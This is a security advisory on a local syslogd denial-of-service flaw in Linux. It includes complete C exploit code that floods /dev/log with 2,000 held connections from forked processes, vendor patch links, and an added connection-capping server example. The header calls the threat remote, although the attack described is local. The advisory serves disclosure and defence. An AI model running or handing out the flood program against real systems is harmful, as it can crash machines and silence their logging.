Linux syslog issue

Published: 1999-10-24
Updated: 1999-10-24
Severity: Medium
Threat type: Remote denial of service
Error type: Exceptional condition handling error
Exploitation method: Server mode
Affected systems: Linux

Detailed description

Syslogd accepts system log messages over a Unix domain stream socket (/dev/log). Unix domain stream sockets require a connection between server and client, so every client has to open its own connection. If a large number of local syslog connections are created within a short time, the system suffers a denial of service. One or a few connections do not make it unresponsive, because syslog manages its connections synchronously with the select() call. With the code below, however, which opens 2000 connections to syslog from several processes, the machine immediately locks up and prints the message: 'Kernel panic: can't push onto full stack'

Test code

/*
 *
 * shutup - syslogd 1.3 denial of service
 * by Mixter
 *
 * This opens up to 2000 unix domain socket connections
 * to /dev/log, attempting to stop syslog from responding.
 * WARNING: This apparently causes the kernel to panic!
 * You might have to run this 2 times to reproduce it as non-root.
 * This code is for educational purposes only, do not abuse.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>

#define PATH "/dev/log"
#define SHUTUPS 200
#define PROCS 10

int main (void)
{
  int s, i;
  struct sockaddr_un sun;
  char host[128];

  sun.sun_family = AF_UNIX;
  strncpy (sun.sun_path, PATH, 100);
  gethostname (host, 128);
  printf ("shutup - syslog1.3 DoS (c) Mixter - http://1337.tsx.org\n");
  printf ("syslog on %s is now being overloaded...\n", host);

  /* detach from the terminal, then fan out into PROCS child processes */
  if (fork ())
    exit (0);
  for (i = 0; i < PROCS; i++)
    if (fork () == 0)
      break;

  /* each child opens SHUTUPS stream connections to /dev/log and keeps them open */
  for (i = 0; i < SHUTUPS; i++)
    {
      if ((s = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
        {
          perror ("socket");
          while (1);
        }
      if (connect (s, (struct sockaddr *) &sun, sizeof (struct sockaddr)) < 0)
        {
          perror ("connect");
          close (s);
          i--;
        }
    }
  while (1);
}

Solution

Download the patch:

S.u.S.E. Linux:
ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/syslogd-1.3.33-9.alpha.rpm
ftp://ftp.suse.com/pub/suse/i386/update/5.3/a1/syslogd-1.3.33-9.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/syslogd-1.3.33-9.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/syslogd-1.3.33-9.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/a1/syslogd-1.3.33-9.i386.rpm

S.u.S.E. Mirror Listing:
http://www.suse.de/de/support/download/ftp/inland.html
http://www.suse.de/de/support/download/ftp/ausland.html

Related information
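The detailed description above turns on a fan-in problem: a stream-socket daemon that accepts one connection per client and never bounds how many it holds. The usual daemon-side defence is to cap concurrent clients and refuse the rest, so a flood of idle connections fills a fixed table instead of exhausting descriptors or overrunning select()'s FD_SETSIZE. The program below is an added example written for this page; it is neither the advisory's test code nor syslogd's own source, and it does not claim to fix the kernel condition the advisory reports (that is what the vendor packages address). The socket path /tmp/example-log.sock, the MAX_CLIENTS limit and the listen backlog are assumptions.

```c
/* Added example (not from the advisory or syslogd): a select()-based AF_UNIX
 * stream listener that bounds the number of concurrent clients it holds. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/un.h>

#define LOG_PATH    "/tmp/example-log.sock"  /* assumption: a test path, not /dev/log */
#define MAX_CLIENTS 64                       /* assumption: kept well below FD_SETSIZE */

struct client_table {
    int fds[MAX_CLIENTS];
    int count;
};

void table_init(struct client_table *t) { t->count = 0; }

/* Admit a freshly accepted descriptor. Returns 1 if kept, 0 if refused.
 * A refused descriptor is closed immediately, so the table stays bounded and
 * every descriptor handed to select() is below FD_SETSIZE. */
int admit_client(struct client_table *t, int fd) {
    if (fd < 0) return 0;
    if (t->count >= MAX_CLIENTS || fd >= FD_SETSIZE) {
        close(fd);
        return 0;
    }
    t->fds[t->count++] = fd;
    return 1;
}

/* Close and remove one client (on EOF or read error). */
void drop_client(struct client_table *t, int idx) {
    close(t->fds[idx]);
    t->fds[idx] = t->fds[--t->count];
}

/* Build the read set from the listener plus admitted clients; returns nfds. */
int build_readset(const struct client_table *t, int listen_fd, fd_set *rs) {
    int i, maxfd = listen_fd;
    FD_ZERO(rs);
    FD_SET(listen_fd, rs);
    for (i = 0; i < t->count; i++) {
        FD_SET(t->fds[i], rs);
        if (t->fds[i] > maxfd) maxfd = t->fds[i];
    }
    return maxfd + 1;
}

/* Create the listening stream socket at path. Returns the fd or -1. */
int make_listener(const char *path) {
    struct sockaddr_un sun;
    int s = socket(AF_UNIX, SOCK_STREAM, 0);
    if (s < 0) return -1;
    memset(&sun, 0, sizeof sun);
    sun.sun_family = AF_UNIX;
    strncpy(sun.sun_path, path, sizeof sun.sun_path - 1);
    unlink(path);
    if (bind(s, (struct sockaddr *)&sun, sizeof sun) < 0 || listen(s, 16) < 0) {
        close(s);
        return -1;
    }
    return s;
}

/* One pass of the event loop: accept (or refuse) a pending client and read one
 * record from each ready client. Returns how many clients were refused. */
int serve_once(int listen_fd, struct client_table *t, int timeout_ms) {
    fd_set rs;
    char buf[1024];
    int i, refused = 0;
    struct timeval tv = { timeout_ms / 1000, (timeout_ms % 1000) * 1000 };
    int nfds = build_readset(t, listen_fd, &rs);
    if (select(nfds, &rs, NULL, NULL, &tv) <= 0) return 0;
    if (FD_ISSET(listen_fd, &rs)) {
        int c = accept(listen_fd, NULL, NULL);
        if (c >= 0 && !admit_client(t, c)) refused++;
    }
    /* iterate downwards so drop_client's swap-with-last never skips an entry */
    for (i = t->count - 1; i >= 0; i--) {
        if (!FD_ISSET(t->fds[i], &rs)) continue;
        ssize_t n = read(t->fds[i], buf, sizeof buf - 1);
        if (n <= 0) { drop_client(t, i); continue; }
        buf[n] = '\0';
        printf("log: %s\n", buf);
    }
    return refused;
}

int main(void) {
    struct client_table t;
    int lfd = make_listener(LOG_PATH);
    if (lfd < 0) { perror("listen"); return 1; }
    table_init(&t);
    for (;;) serve_once(lfd, &t, 1000);
}
```

The cap is the whole point: once MAX_CLIENTS connections are held, further connections are accepted and closed at once rather than queued, so idle clients cannot grow the descriptor set without bound. A production daemon would add an idle timeout per client and per-credential limits (SO_PEERCRED is available on AF_UNIX sockets) on top of this fixed table.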